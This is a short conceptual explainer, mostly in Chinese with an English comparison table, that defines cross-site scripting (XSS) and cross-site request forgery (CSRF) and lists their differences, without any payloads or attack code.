1. XSS:
XSS 是一种在 Web 应用程序中发现的计算机安全漏洞,它使网络犯罪分子能够将客户端脚本注入用户查看的网页中。网络犯罪分子让受害者的浏览器执行攻击者在访问受信任网站时注入的脚本(主要用 JavaScript 编写)。网络犯罪分子有多种方式将 JavaScript 注入受害者信任的网站。它不需要经过身份验证的会话,并且可以在易受攻击的网站不执行验证或转义输入的基础操作时被利用。
2.CSRF:
跨站点请求伪造是最严重的计算机安全漏洞之一,可以通过多种方式加以利用,从在用户不知情的情况下更改用户信息到获得对用户帐户的完全访问权限。网络犯罪分子试图利用现有受害者的上下文(例如 cookie)强迫/诱骗您提出您不打算提出的请求。每次您与网站交互时,其服务器都会检查您随请求发送的 cookie,因此它知道是您本人。
XSS 和 CSRF 的区别:
| S.No. | XSS | CSRF |
|---|---|---|
| 1. | XSS stands for Cross-Site Scripting. | CSRF stands for Cross-Site Request Forgery. |
| 2. | The cybercriminal injects a malicious client side script in a website. The script is added to cause some form of vulnerability to a victim. | The malicious attack is created in such a way that a user sends malicious requests to the target website without having knowledge of the attack. |
| 3. | In this, injection of arbitrary data by data that is not validated. | It depends on the functionality and features of the browser to retrieve and execute the attack bundle. |
| 4. | It has a requirement of JavaScript. | It does not has requirement of JavaScript. |
| 5. | The site accepts the malicious code. | The malicious code is stored in third party sites. |
| 6. | The site that is vulnerable to XSS attacks is also vulnerable to CSRF attacks. | The site that is completely protected from XSS attack types is still vulnerable to CSRF attacks. |
| 7. | XSS is more harmful as compared. | CSRF is less harmful as compared. |
| 8. | Using XSS vulnerability the attacker can do anything he/she wants. | Using CSRF vulnerability the attacker can do only what the vulnerable urls do. |